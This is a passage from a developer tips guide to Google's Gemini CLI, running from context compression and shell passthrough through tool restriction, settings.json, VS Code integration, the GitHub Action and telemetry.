When to compress: Ideally before you hit the limit. If you notice the session is getting lengthy (several hundred turns or a lot of code in context), compress proactively. The cheat sheet mentions an automatic compression setting (e.g., compress when context exceeds 60% of max). If you enable that, Gemini might auto-compress and let you know. Otherwise, manual /compress is in your toolkit.
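To make the threshold idea concrete, here is a tiny Python sketch of the rule of thumb. It is not Gemini CLI’s implementation: should_compress is a hypothetical helper, and the 0.6 default simply mirrors the 60% example mentioned above.

```python
def should_compress(tokens_used, context_limit, threshold=0.6):
    """Return True once usage exceeds the given fraction of the window."""
    if context_limit <= 0:
        raise ValueError("context_limit must be positive")
    return tokens_used / context_limit > threshold
```

With a 1M-token window and the 60% example, this would suggest compressing once the session passes roughly 600,000 tokens.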

After compressing: You can continue the conversation normally. If needed, you can compress multiple times in a very long session. Each time, you lose some granularity, so don’t compress too frequently for no reason - you might end up with an overly brief remembrance of a complex discussion. But generally the model’s own summarization is pretty good at keeping the key facts (and you can always restate anything critical yourself).

Context window example: Let’s illustrate. Suppose you fed in a large codebase by referencing many files and had a 1M token context (the max). If you then want to shift to a different part of the project, rather than starting a new session (losing all that understanding), you could compress. The summary will condense the knowledge gleaned from the code (like “We loaded modules A, B, C. A has these functions… B interacts with C in these ways…”). Now you can proceed to ask about new things with that knowledge retained abstractly.

Memory vs Compression: Note that compression doesn’t save to long-term memory, it’s local to the conversation. If you have facts you never want lost, consider Tip 4 (adding to /memory) - because memory entries will survive compression (they’ll just be reinserted anyway since they are in GEMINI.md context). Compression is more about ephemeral chat content.

A minor caution: after compression, the AI’s style might slightly change because it’s effectively seeing a “fresh” conversation with a summary. It might reintroduce itself or change tone. You can instruct it like “Continue from here… (we compressed)” to smooth it out. In practice, it often continues fine.

To summarize (pun intended), use /compress as your session grows long to maintain performance and relevance. It helps Gemini CLI focus on the bigger picture instead of every detail of the conversation’s history. This way, you can have marathon debugging sessions or extensive design discussions without running out of the “mental paper” the AI is writing on.

Tip 16: Passthrough Shell Commands with `!` (Talk to Your Terminal)

Quick use-case: At any point in a Gemini CLI session, you can run actual shell commands by prefixing them with !. For example, if you want to check the git status, just type !git status and it will execute in your terminal. This saves you from switching windows or context - you’re still in the Gemini CLI, but you’re essentially telling it “let me run this command real quick.”

This tip is about Shell Mode in Gemini CLI. There are two ways to use it:

Single command: Just put ! at the start of your prompt, followed by any command and arguments. This will execute that command in the current working directory and display the output in-line. For example:

!ls -lh src/

will list the files in the src directory, outputting something like you’d see in a normal terminal. After the output, the Gemini prompt returns so you can continue chatting or issue more commands.

Persistent shell mode: If you enter ! alone and hit Enter, Gemini CLI switches into a sub-mode where you get a shell prompt (often it looks like shell> or similar). Now you can type multiple shell commands interactively. It’s basically a mini-shell within the CLI. You exit this mode by typing ! on an empty line again (or exit). For instance:

!
shell> pwd
/home/alice/project
shell> python --version
Python 3.x.x
shell> !

After the final !, you’re back to the normal Gemini prompt.

Why is this useful? Because development is a mix of actions and inquiries. You might be discussing something with the AI and realize you need to compile the code or run tests to see something. Instead of leaving the conversation, you can quickly do it and feed the result back into the chat. In fact, Gemini CLI often does this for you as part of its tool usage (it might automatically run !pytest when you ask to fix tests, for example). But as the user, you have full control to do it manually too.

Examples:

After Gemini suggests a fix in code, you can do !npm run build to see if it compiles, then copy any errors and ask Gemini to help with those.
If you want to open a file in vim or nano, you could even launch it via !nano filename (though note that since Gemini CLI has its own interface, using an interactive editor inside it might be a bit awkward - better to use the built-in editor integration or copy to your editor).
You can use shell commands to gather info for the AI: e.g., !grep TODO -R . to find all TODOs in the project, then you might ask Gemini to help address those TODOs.
Or simply use it for environment tasks: !pip install some-package if needed, etc., without leaving the CLI.

Seamless interplay: One cool aspect is how the conversation can refer to outputs. For example, you could do !curl http://example.com to fetch some data, see the output, then immediately say to Gemini, “Format the above output as JSON” - since the output was printed in the chat, the AI has it in context to work with (provided it’s not too large).

Terminal as a default shell: If you find yourself always prefacing commands with !, you can actually make the shell mode persistent by default. One way is launching Gemini CLI with a specific tool mode (there’s a concept of default tool). But easier: just drop into shell mode (! with nothing) at session start if you plan to run a lot of manual commands and only occasionally talk to AI. Then you can exit shell mode whenever you want to ask a question. It’s almost like turning Gemini CLI into your normal terminal that happens to have an AI readily available.

Integration with AI planning: Sometimes Gemini CLI itself will propose to run a shell command. If you approve, it effectively does the same as !command. Understanding that, you know you can always intervene. If Gemini is stuck or you want to try something, you don’t have to wait for it to suggest - you can just do it and then continue.

In summary, the ! passthrough means you don’t have to leave Gemini CLI for shell tasks. It collapses the boundary between chatting with the AI and executing commands on your system. As a pro user, this is fantastic for efficiency - your AI and your terminal become one continuous environment.

Tip 17: Treat Every CLI Tool as a Potential Gemini Tool

Quick use-case: Realize that Gemini CLI can leverage any command-line tool installed on your system as part of its problem-solving. The AI has access to the shell, so if you have cURL, ImageMagick, git, Docker, or any other tool, Gemini can invoke it when appropriate. In other words, your entire $PATH is the AI’s toolkit. This greatly expands what it can do - far beyond its built-in tools.

For example, say you ask: “Convert all PNG images in this folder to WebP format.” If you have ImageMagick’s convert utility installed, Gemini CLI might plan something like a shell loop that runs the convert command on each file. Indeed, one of the earlier examples from a blog showed exactly this: the user asked for a batch conversion, and Gemini executed a shell one-liner built around the convert tool.
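For reference, the kind of batch job described here can be sketched in a few lines of Python. This is a hedged illustration rather than what Gemini actually generates: webp_commands and convert_all are hypothetical names, and the code assumes ImageMagick’s convert binary is on your $PATH (newer ImageMagick releases prefer the magick command). By default it only prints the commands.

```python
import shlex
import subprocess
from pathlib import Path


def webp_commands(folder):
    """Build one ImageMagick `convert` invocation per PNG in `folder`."""
    return [
        ["convert", str(png), str(png.with_suffix(".webp"))]
        for png in sorted(Path(folder).glob("*.png"))
    ]


def convert_all(folder, dry_run=True):
    """Print each command; run it only when dry_run is False."""
    for cmd in webp_commands(folder):
        print(shlex.join(cmd))
        if not dry_run:
            # Assumes `convert` is installed; raises if it exits non-zero.
            subprocess.run(cmd, check=True)
```

Calling convert_all(".") prints the plan; convert_all(".", dry_run=False) would actually run it.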

Another scenario: “Deploy my app to Docker.” If Docker CLI is present, the AI could call docker build and docker run steps as needed. Or “Use FFmpeg to extract audio from video.mp4” - it can construct the ffmpeg command.

This tip is about mindset: Gemini isn’t limited to what’s coded into it (which is already extensive). It can figure out how to use other programs available to achieve a goal. It knows common syntax and can read help texts if needed (it could call --help on a tool). The only limitation is safety: by default, it will ask confirmation for any run_shell_command it comes up with. But as you become comfortable, you might allow certain benign commands automatically (see YOLO or allowed-tools config).

Be mindful of the environment: “With great power comes great responsibility.” Since every shell tool is fair game, you should ensure that your $PATH doesn’t include anything you wouldn’t want the AI to run inadvertently. This is where Tip 19 (custom PATH) comes in - some users create a restricted $PATH for Gemini, so it can’t, say, directly call destructive system commands or call gemini recursively (to avoid loops). The point is, by default if gcc or terraform or anything else is in $PATH, Gemini could invoke it. It doesn’t mean it will randomly do so - only if the task calls for it - but it’s possible.

Train of thought example: Imagine you ask Gemini CLI: “Set up a basic HTTP server that serves the current directory.” The AI might think: “I can use Python’s built-in server for this.” It then issues !python3 -m http.server 8000. Now it just used a system tool (Python) to launch a server. That’s an innocuous example. Another: “Check the memory usage on this Linux system.” The AI might use the free -h command or read from /proc/meminfo. It’s effectively doing what a sysadmin would do, by using available commands.

All tools are extensions of the AI: This is somewhat futuristic, but consider that any command-line program can be seen as a “function” the AI can call to extend its capability. Need to solve a math problem? It could call bc (calculator). Need to manipulate an image? It could call an image processing tool. Need to query a database? If the CLI client is installed and credentials are there, it can use it. The possibilities are expansive. In other AI agent frameworks, this is known as tool use, and Gemini CLI is designed with a lot of trust in its agent to decide the right tool.

When it goes wrong: The flip side is if the AI misunderstands a tool or has a hallucination about one. It might try to call a command that doesn’t exist, or use wrong flags, resulting in errors. This isn’t a big deal - you’ll see the error and can correct or clarify. In fact, the system prompt of Gemini CLI likely guides it to first do a dry-run (just propose the command) rather than executing blindly. So you often get a chance to catch these. Over time, the developers are improving the tool selection logic to reduce these missteps.

The main takeaway is to think of Gemini CLI as having a very large Swiss Army knife - not just the built-in blades, but every tool in your OS. You don’t have to instruct it on how to use them if it’s something standard; usually it knows or can find out. This significantly amplifies what you can accomplish. It’s like having a junior dev or devops engineer who knows how to run pretty much any program you have installed.

As a pro user, you can even install additional CLI tools specifically to give Gemini more powers. For example, if you install a CLI for a cloud service (AWS CLI, GCloud CLI, etc.), in theory Gemini can utilize it to manage cloud resources if prompted to. Always ensure you understand and trust the commands run, especially with powerful tools (you wouldn’t want it spinning up huge cloud instances accidentally). But used wisely, this concept - everything is a Gemini tool - is what makes it exponentially more capable as you integrate it into your environment.

Tip 18: Utilize Multimodal AI - Let Gemini See Images and More

Quick use-case: Gemini CLI isn’t limited to text - it’s multimodal. This means it can analyze images, diagrams, or even PDFs if given. Use this to your advantage. For instance, you could say “Here’s a screenshot of an error dialog, @./error.png - help me troubleshoot this.” The AI will “see” the image and respond accordingly.

One of the standout features of Google’s Gemini models is image understanding. In Gemini CLI, if you reference an image with @, the model receives the image data. It can output descriptions, classifications, or reason about the image’s content. We already discussed renaming images by content (Tip 14) and describing screenshots (Tip 7). But let’s consider other creative uses:

UI/UX feedback: If you’re a developer working with designers, you can drop a UI image and ask Gemini for feedback or to generate code. “Look at this UI mockup @mockup.png and produce a React component structure for it.” It could identify elements in the image (header, buttons, etc.) and outline code.
Organizing images: Beyond renaming, you might have a folder of mixed images and want to sort by content. “Sort the images in ./photos/ into subfolders by theme (e.g., sunsets, mountains, people).” The AI can look at each photo and categorize it (this is similar to what some photo apps do with AI - now you can do it with your own script via Gemini).
OCR and data extraction: If you have a screenshot of error text or a photo of a document, Gemini can often read the text from it. For example, “Extract the text from invoice.png and put it into a structured format.” As shown in a Google Cloud blog example, Gemini CLI can process a set of invoice images and output a table of their info. It basically did OCR + understanding to get invoice numbers, dates, amounts from pictures of invoices. That’s an advanced use-case but entirely possible with the multimodal model under the hood.
Understanding graphs or charts: If you have a graph screenshot, you could ask “Explain this chart’s key insights @chart.png.” It might interpret the axes and trends. Accuracy can vary, but it’s a nifty try.

To make this practical: when you @image.png, ensure the image isn’t too huge (though the model can handle reasonably large images). The CLI will likely encode it and send it to the model. The response might include descriptions or further actions. You can mix text and image references in one prompt too.

Non-image modalities: The CLI and model potentially can handle PDFs and audio too, by converting them via tools. For example, if you @report.pdf, Gemini CLI might use a PDF-to-text tool under the hood to extract text and then summarize. If you @audio.mp3 and ask for a transcript, it might use an audio-to-text tool (like a speech recognition function). The cheat sheet suggests referencing PDFs, audio, video files is supported, presumably by invoking appropriate internal tools or APIs. So, “transcribe this interview audio: @interview.wav” could actually work (if not now, likely soon, since underlying Google APIs for speech-to-text could be plugged in).

Rich outputs: Multimodal also means the AI can return images in responses if integrated (though in CLI it usually won’t display them directly, but it could save an image file or output ASCII art, etc.). The MCP capability mentioned that tools can return images. For instance, an AI drawing tool could generate an image and Gemini CLI could present it (maybe by opening it or giving a link).

Important: The CLI itself is text-based, so you won’t see the image in the terminal (unless it’s capable of ASCII previews). You’ll just get the analysis. So this is mostly about reading images, not displaying them. If you’re in VS Code integration, it might show images in the chat view.

In summary, don’t forget the “I” in GUI when using Gemini CLI - it can handle the visual just as well as the textual in many cases. This opens up workflows like visual debugging, design help, data extraction from screenshots, etc., all under the same tool. It’s a differentiator that some other CLI tools may not have yet. And as models improve, this multimodal support will only get more powerful, so it’s a future-proof skill to exploit.

Tip 19: Customize the `$PATH` (and Tool Availability) for Stability

Quick use-case: If you ever find Gemini CLI getting confused or invoking the wrong programs, consider running it with a tailored $PATH. By limiting or ordering the available executables, you can prevent the AI from, say, calling a similarly named script that you didn’t intend. Essentially, you sandbox its tool access to known-good tools.

For most users, this isn’t an issue, but for pro users with lots of custom scripts or multiple versions of tools, it can be helpful. One reason mentioned by the developers is avoiding infinite loops or weird behavior. For example, if gemini itself is in $PATH, an AI gone awry might recursively call gemini from within Gemini (a strange scenario, but theoretically possible). Or perhaps you have a command named test that conflicts with something - the AI might call the wrong one.

How to set PATH for Gemini: Easiest is inline on launch:

PATH=/usr/bin:/usr/local/bin gemini

This runs Gemini CLI with a restricted $PATH of just those directories. You might exclude directories where experimental or dangerous scripts lie. Alternatively, create a small shell script wrapper that purges or adjusts $PATH then exec’s gemini.
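The wrapper idea can also be sketched in Python instead of a shell script. Treat this as a minimal sketch under stated assumptions: restricted_env is a hypothetical helper, the directory list is just an example, and the gemini binary must itself live in one of the allowed directories or the launch will fail.

```python
import os


def restricted_env(allowed_dirs, base_env=None):
    """Return a copy of the environment whose PATH holds only allowed_dirs."""
    env = dict(os.environ if base_env is None else base_env)
    env["PATH"] = os.pathsep.join(allowed_dirs)
    return env


# Usage sketch (left as a comment so nothing is launched on import):
# replace the current process with gemini, so the CLI and every tool
# it spawns see only the restricted PATH.
#
#   env = restricted_env(["/usr/bin", "/usr/local/bin"])
#   os.execvpe("gemini", ["gemini"], env)
```

Every other environment variable is passed through unchanged; only PATH is narrowed.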

Another approach is using environment or config to explicitly disable certain tools. For instance, if you absolutely never want the AI to use rm or some destructive tool, you could technically create an alias or dummy rm in a safe $PATH that does nothing (though this could interfere with normal operations, so maybe not that one). A better method is the exclude list in settings. In an extension or settings.json, you can exclude tool names. E.g.,

"excludeTools": ["run_shell_command"]

This extreme example would stop all shell commands from running (making Gemini effectively read-only). For something more granular, you might configure an exclusion list along these lines:

"tools": {
  "exclude": ["apt-get", "shutdown"]
}

(This syntax is illustrative; consult docs for exact usage.)

The principle is, by controlling the environment, you reduce risk of the AI doing something dumb with a tool it shouldn’t. It’s akin to child-proofing the house.

Prevent infinite loops: One user scenario was a loop where Gemini kept reading its own output or re-reading files repeatedly. Custom $PATH can’t directly fix logic loops, but one cause could be if the AI calls a command that triggers itself. Ensuring it can’t accidentally spawn another AI instance (like calling bard or gemini command, if it thought to do so) is good. Removing those from $PATH (or renaming them for that session) helps.

Isolation via sandbox: Another alternative to messing with $PATH is using --sandbox mode (which uses Docker or Podman to run tools in an isolated environment). In that case, the AI’s actions are contained and have only the tools that sandbox image provides. You could supply a Docker image with a curated set of tools. This is heavy-handed but very safe.

Custom PATH for specific tasks: You might have different $PATH setups for different projects. For example, in one project you want it to use a specific version of Node or a local toolchain. Launching gemini with the $PATH that points to those versions will ensure the AI uses the right one. Essentially, treat Gemini CLI like any user - it uses whatever environment you give it. So if you need it to pick gcc-10 vs gcc-12, adjust $PATH or CC env var accordingly.

In summary: Guard rails. As a power user, you have the ability to fine-tune the operating conditions of the AI. If you ever find a pattern of undesirable behavior tied to tool usage, tweaking $PATH is a quick remedy. For everyday use, you likely won’t need this, but it’s a pro tip to keep in mind if you integrate Gemini CLI into automation or CI: give it a controlled environment. That way, you know exactly what it can and cannot do, which increases reliability.

Tip 20: Track and reduce token spend with token caching and stats

If you run long chats or repeatedly attach the same big files, you can cut cost and latency by turning on token caching and monitoring usage. With an API key or Vertex AI auth, Gemini CLI automatically reuses previously sent system instructions and context, so follow‑up requests are cheaper. You can see the savings live in the CLI.

How to use it

Use an auth mode that enables caching. Token caching is available when you authenticate with a Gemini API key or Vertex AI. It is not available with OAuth login today.

Inspect your usage and cache hits. Run the stats command during a session. It shows total tokens and a cached field when caching is active.

/stats

The command’s description and cached reporting behavior are documented in the commands reference and FAQ.

Capture metrics in scripts. When running headless, output JSON and parse the stats block, which includes tokens.cached for each model:

gemini -p "Summarize README" --output-format json

The headless guide documents the JSON schema with cached token counts.

Save a session summary to file: For CI or budget tracking, write a JSON session summary to disk.

gemini -p "Analyze logs" --session-summary usage.json

This flag is listed in the changelog.

With API key or Vertex auth, the CLI automatically reuses previously sent context so later turns send fewer tokens. Keeping GEMINI.md and large file references stable across turns increases cache hits; you’ll see that reflected in stats as cached tokens.
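To track cache hits in a script, the headless JSON output mentioned above can be parsed with a few lines of Python. This is a minimal sketch that assumes the layout stats → models → (model name) → tokens, with cached and total fields; check the headless guide for the exact schema of your CLI version. The sample payload and model name are made up for illustration:

```python
import json


def cached_token_summary(raw_json):
    """Return {model_name: (cached_tokens, total_tokens)} from a JSON response string."""
    data = json.loads(raw_json)
    # Assumed layout: data["stats"]["models"][name]["tokens"]["cached"]
    models = data.get("stats", {}).get("models", {})
    summary = {}
    for name, info in models.items():
        tokens = info.get("tokens", {})
        summary[name] = (tokens.get("cached", 0), tokens.get("total", 0))
    return summary


# Made-up sample shaped like the assumed schema, not real CLI output.
sample = json.dumps({
    "response": "ok",
    "stats": {"models": {"example-model": {"tokens": {"total": 1000, "cached": 400}}}},
})

for model, (cached, total) in cached_token_summary(sample).items():
    print(f"{model}: {cached} of {total} tokens served from cache")
```

In a real script you would feed it the captured stdout of the gemini -p ... --output-format json command instead of the sample string.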

Tip 21: Use `/copy` for Quick Clipboard Copy

Quick use-case: Instantly copy the latest answer or code snippet from Gemini CLI to your system clipboard, without any extraneous formatting or line numbers. This is perfect for quickly pasting AI-generated code into your editor or sharing a result with a teammate.

When Gemini CLI provides an answer (especially a multi-line code block), you often want to reuse it elsewhere. The /copy slash command makes this effortless by copying the last output produced by the CLI directly to your clipboard. Unlike manual selection (which can grab line numbers or prompt text), /copy grabs only the raw response content. For example, if Gemini just generated a 50-line Python script, simply typing /copy will put that entire script into your clipboard, ready to paste - no need to scroll and select text. Under the hood, Gemini CLI uses the appropriate clipboard utility for your platform (e.g. pbcopy on macOS, clip on Windows). Once you run the command, you’ll typically see a confirmation message, and then you can paste the copied text wherever you need it.

How it works: The /copy command requires that your system has a clipboard tool available. On macOS and Windows, the required tools (pbcopy and clip respectively) are usually pre-installed. On Linux, you may need to install xclip or xsel for /copy to function. After ensuring that, you can use /copy anytime after Gemini CLI prints an answer. It will capture the entire last response (even if it’s long) and omit any internal numbering or formatting the CLI may show on-screen. This saves you from dealing with unwanted artifacts when transferring the content. It’s a small feature, but a huge time-saver when you’re iterating on code or compiling a report generated by the AI.

Pro Tip: If you find the /copy command isn’t working, double-check that your clipboard utilities are installed and accessible. For instance, Ubuntu users should run sudo apt install xclip to enable clipboard copying. Once set up, /copy lets you share Gemini’s outputs with zero friction - copy, paste, and you’re done.
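If /copy fails and you want to check which clipboard tool is available, the platform rules described above can be sketched in Python. This is an illustration of the selection logic only, not Gemini CLI's actual implementation; the function name is hypothetical:

```python
import shutil
import sys


def clipboard_command(platform=None, which=shutil.which):
    """Return the clipboard command for the platform, or None if none is found."""
    platform = sys.platform if platform is None else platform
    if platform == "darwin":
        return ["pbcopy"]
    if platform == "win32":
        return ["clip"]
    # Other platforms (e.g. Linux): use whichever of xclip or xsel is installed.
    candidates = (
        ["xclip", "-selection", "clipboard"],
        ["xsel", "--clipboard", "--input"],
    )
    for candidate in candidates:
        if which(candidate[0]):
            return candidate
    return None


print(clipboard_command())
```

If this prints None on Linux, neither xclip nor xsel is on your PATH, which would explain a failing /copy.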

Tip 22: Master `Ctrl+C` for Shell Mode and Exiting

Quick use-case: Cleanly interrupt Gemini CLI or exit shell mode with a single keypress - and quit the CLI entirely with a quick double-tap - thanks to the versatile Ctrl+C shortcut. This gives you immediate control when you need to stop or exit.

Gemini CLI operates like a REPL, and knowing how to break out of operations is essential. Pressing Ctrl+C once will cancel the current action or clear any input you’ve started typing, essentially acting as an “abort” command. For example, if the AI is generating a lengthy answer and you’ve seen enough, hit Ctrl+C - the generation stops immediately. If you had started typing a prompt but want to discard it, Ctrl+C will wipe the input line so you can start fresh. Additionally, if you are in shell mode (activated by typing ! to run shell commands), a single Ctrl+C will exit shell mode and return you to the normal Gemini prompt (it sends an interrupt to the shell process running). This is extremely handy if a shell command is hanging or you simply want to get back to AI mode.

Pressing Ctrl+C twice in a row is the shortcut to exit Gemini CLI entirely. Think of it as “Ctrl+C to cancel, and Ctrl+C again to quit.” This double-tap signals the CLI to terminate the session (you’ll see a goodbye message or the program will close). It’s a faster alternative to typing /quit or closing the terminal window, allowing you to gracefully shut down the CLI from the keyboard. Do note that a single Ctrl+C will not quit if there’s input to clear or an operation to interrupt - it requires that second press (when the prompt is idle) to fully exit. This design prevents accidentally closing the session when you only meant to stop the current output.

Pro Tip: In shell mode, you can also press the Esc key to leave shell mode and return to Gemini’s chat mode without terminating the CLI. And if you prefer a more formal exit, the /quit command is always available to cleanly end the session. Lastly, Unix users can use Ctrl+D (EOF) at an empty prompt to exit as well - Gemini CLI will prompt for confirmation if needed. But for most cases, mastering the single- and double-tap of Ctrl+C is the quickest way to stay in control.

Tip 23: Customize Gemini CLI with `settings.json`

Quick use-case: Adapt the CLI’s behavior and appearance to your preferences or project conventions by editing the settings.json config file, instead of sticking with one-size-fits-all defaults. This lets you enforce things like theme, tool usage rules, or editor mode across all your sessions.

Gemini CLI is highly configurable. In your home directory (~/.gemini/) or project folder (.gemini/ within your repo), you can create a settings.json file to override default settings. Nearly every aspect of the CLI can be tuned here - from visual theme to tool permissions. The CLI merges settings from multiple levels: system-wide defaults, your user settings, and project-specific settings (project settings override user settings). For example, you might have a global preference for a dark theme, but a particular project might require stricter tool sandboxing; you can handle this via different settings.json files at each level.

Inside settings.json, options are specified as JSON key-value pairs. Here’s a snippet illustrating some useful customizations:

{
  "theme": "GitHub",
  "autoAccept": false,
  "vimMode": true,
  "sandbox": "docker",
  "includeDirectories": ["../shared-library", "~/common-utils"],
  "usageStatisticsEnabled": true
}

In this example, we set the theme to “GitHub” (a popular color scheme), disable autoAccept (so the CLI will always ask before running potentially altering tools), enable Vim keybindings for the input editor, and enforce using Docker for tool sandboxing. We also added some directories to the workspace context (includeDirectories) so Gemini can see code in shared paths by default. Finally, we kept usageStatisticsEnabled true to collect basic usage stats (which feeds into telemetry, if enabled). There are many more settings available - like defining custom color themes, adjusting token limits, or whitelisting/blacklisting specific tools - all documented in the configuration guide. By tailoring these, you ensure Gemini CLI behaves optimally for your workflow (for instance, some developers always want vimMode on for efficiency, while others might prefer the default editor).

One convenient way to edit settings is via the built-in settings UI. Run the command /settings in Gemini CLI, and it will open an interactive editor for your configuration. This interface lets you browse and search settings with descriptions, and prevents JSON syntax errors by validating inputs. You can tweak colors, toggle features like yolo (auto-approval), adjust checkpointing (file save/restore behavior), and more through a friendly menu. Changes are saved to your settings.json, and some take effect immediately (others might require restarting the CLI).

Pro Tip: Maintain separate project-specific settings.json files for different needs. For example, on a team project you might set "sandbox": "docker" and "excludeTools": ["run_shell_command"] to lock down dangerous operations, while your personal projects might allow direct shell commands. Gemini CLI will automatically pick up the nearest .gemini/settings.json in your project directory tree and merge it with your global ~/.gemini/settings.json. Also, don’t forget you can quickly adjust visual preferences: try /theme to interactively switch themes without editing the file, which is great for finding a comfortable look. Once you find one, put it in settings.json to make it permanent.
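To make the layering concrete, here is a small Python sketch of the precedence rule: later layers win, so project settings override user settings. It only illustrates the idea; how the CLI itself merges nested objects or arrays is not covered here, and the recursive handling below is an assumption:

```python
def merge_settings(*layers):
    """Merge settings dicts in order; later layers override earlier ones."""
    merged = {}
    for layer in layers:
        for key, value in layer.items():
            if isinstance(value, dict) and isinstance(merged.get(key), dict):
                # Assumption: nested objects are merged key by key.
                merged[key] = merge_settings(merged[key], value)
            else:
                merged[key] = value
    return merged


# Illustrative values taken from the examples in this tip.
user_settings = {"theme": "GitHub", "vimMode": True}
project_settings = {
    "sandbox": "docker",
    "excludeTools": ["run_shell_command"],
    "vimMode": False,
}

effective = merge_settings(user_settings, project_settings)
print(effective)
```

Here the project turns vimMode off and adds its sandbox rules, while the user's theme carries through untouched.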

Tip 24: Leverage IDE Integration (VS Code) for Context & Diffs

Quick use-case: Supercharge Gemini CLI by hooking it into VS Code - the CLI will automatically know which files you’re working on and even open AI-proposed code changes in VS Code’s diff editor for you. This creates a seamless loop between AI assistant and your coding workspace.

One of Gemini CLI’s powerful features is its IDE integration with Visual Studio Code. By installing the official Gemini CLI Companion extension in VS Code and connecting it, you allow Gemini CLI to become “context-aware” of your editor. What does this mean in practice? When connected, Gemini knows about the files you have open, your current cursor location, and any text you’ve selected in VS Code. All that information is fed into the AI’s context. So if you ask, “Explain this function,” Gemini CLI can see the exact function you’ve highlighted and give a relevant answer, without you needing to copy-paste code into the prompt. The integration shares up to your 10 most recently opened files, plus selection and cursor info, giving the model a rich understanding of your workspace.

Another huge benefit is native diffing of code changes. When Gemini CLI suggests modifications to your code (for example, “refactor this function” and it produces a patch), it can open those changes in VS Code’s diff viewer automatically. You’ll see a side-by-side diff in VS Code showing the proposed edits. You can then use VS Code’s familiar interface to review the changes, make any manual tweaks, and even accept the patch with a click. The CLI and editor stay in sync - if you accept the diff in VS Code, Gemini CLI knows and continues the session with those changes applied. This tight loop means you no longer have to copy code from the terminal to your editor; the AI’s suggestions flow straight into your development environment.

How to set it up: If you start Gemini CLI inside VS Code’s integrated terminal, it will detect VS Code and usually prompt you to install/connect the extension automatically. You can agree and it will run the necessary /ide install step. If you don’t see a prompt (or you’re enabling it later), simply open Gemini CLI and run the command: /ide install. This will fetch and install the “Gemini CLI Companion” extension into VS Code for you. Next, run /ide enable to establish the connection - the CLI will then indicate it’s linked to VS Code. You can verify at any time with /ide status, which will show if it’s connected and list which editor and files are being tracked. From then on, Gemini CLI will automatically receive context from VS Code (open files, selections) and will open diffs in VS Code when needed. It essentially turns Gemini CLI into an AI pair programmer that lives in your terminal but operates with full awareness of your IDE.

Currently, VS Code is the primary supported editor for this integration. (Other editors that support VS Code extensions, like VSCodium or some JetBrains via a plugin, may work via the same extension, but officially it’s VS Code for now.) The design is open though - there’s an IDE Companion Spec for developing similar integrations with other editors. So down the road we might see first-class support for IDEs like IntelliJ or Vim via community extensions.

Pro Tip: Once connected, you can use VS Code’s Command Palette to control Gemini CLI without leaving the editor. For example, press Ctrl+Shift+P (Cmd+Shift+P on Mac) and try commands like “Gemini CLI: Run” (to launch a new CLI session in the terminal), “Gemini CLI: Accept Diff” (to approve and apply an open diff), or “Gemini CLI: Close Diff Editor” (to reject changes). These shortcuts can streamline your workflow even further. And remember, you don’t always have to start the CLI manually - if you enable the integration, Gemini CLI essentially becomes an AI co-developer inside VS Code, watching context and ready to help as you work on code.

Tip 25: Automate Repo Tasks with `Gemini CLI GitHub Action`

Quick use-case: Put Gemini to work on GitHub - use the Gemini CLI GitHub Action to autonomously triage new issues and review pull requests in your repository, acting as an AI teammate that handles routine dev tasks.

Gemini CLI isn’t just for interactive terminal sessions; it can also run in CI/CD pipelines via GitHub Actions. Google has provided a ready-made Gemini CLI GitHub Action (currently in beta) that integrates into your repo’s workflows. This effectively deploys an AI agent into your project on GitHub. It runs in the background, triggered by repository events. For example, when someone opens a new issue, the Gemini Action can automatically analyze the issue description, apply relevant labels, and even prioritize it or suggest duplicates (this is the “intelligent issue triage” workflow). When a pull request is opened, the Action kicks in to provide an AI code review - it will comment on the PR with insights about code quality, potential bugs, or stylistic improvements. This gives maintainers immediate feedback on the PR before any human even looks at it. Perhaps the coolest feature is on-demand collaboration: team members can mention @gemini-cli in an issue or PR comment and give it an instruction, like “@gemini-cli please write unit tests for this”. The Action will pick that up and Gemini CLI will attempt to fulfill the request (adding a commit with new tests, for instance). It’s like having an AI assistant living in your repo, ready to do chores when asked.

Setting up the Gemini CLI GitHub Action is straightforward. First, ensure you have Gemini CLI version 0.1.18 or later installed locally (this ensures compatibility with the Action). Then, in Gemini CLI run the special command: /setup-github. This command generates the necessary workflow files in your repository (it will guide you through authentication if needed). Specifically, it adds YAML workflow files (for issue triage, PR review, etc.) under .github/workflows/. You will need to add your Gemini API key to the repo’s secrets (as GEMINI_API_KEY) so the Action can use the Gemini API. Once that’s done and the workflows are committed, the GitHub Action springs to life - from that point on, Gemini CLI will autonomously respond to new issues and PRs according to those workflows.

Because this Action is essentially running Gemini CLI in an automated way, you can customize it just like you would your CLI. The default setup comes with three workflows (issue triage, PR review, and a general mention-triggered assistant) which are fully open-source and editable (https://blog.google/technology/developers/introducing-gemini-cli-github-actions/). You can tweak the YAML to adjust what the AI does, or even add new workflows. For instance, you might create a nightly workflow that uses Gemini CLI to scan your repository for outdated dependencies or to update a README based on recent code changes - the possibilities are endless. The key benefit here is offloading mundane or time-consuming tasks to an AI agent so that human developers can focus on harder problems. And since it runs on GitHub’s infrastructure, it doesn’t require your intervention - it’s truly a “set and forget” AI helper.

Pro Tip: Keep an eye on the Action’s output in the GitHub Actions logs for transparency. The Gemini CLI Action logs will show what prompts it ran and what changes it made or suggested. This can both build trust and help you refine its behavior. Also, the team has built enterprise-grade safeguards into the Action - e.g., you can require that all shell commands the AI tries to run in a workflow are allow-listed by you. So don’t hesitate to use it even on serious projects. And if you come up with a cool custom workflow using Gemini CLI, consider contributing it back to the community - the project welcomes new ideas in their repo!

Tip 26: Enable Telemetry for Insights and Observability

Quick use-case: Gain deeper insight into how Gemini CLI is being used and performing by turning on its built-in OpenTelemetry instrumentation - monitor metrics, logs, and traces of your AI sessions to analyze usage patterns or troubleshoot issues.

For developers who like to measure and optimize, Gemini CLI offers an observability feature that exposes what’s happening under the hood. By leveraging OpenTelemetry (OTEL), Gemini CLI can emit structured telemetry data about your sessions. This includes things like metrics (e.g. how many tokens used, response latency), logs of actions taken, and even traces of tool calls. With telemetry enabled, you can answer questions like: Which custom command do I use most often? How many times did the AI edit files in this project this week? What’s the average response time when I ask the CLI to run tests? Such data is invaluable for understanding usage patterns and performance. Teams can use it to see how developers are interacting with the AI assistant and where bottlenecks might be.

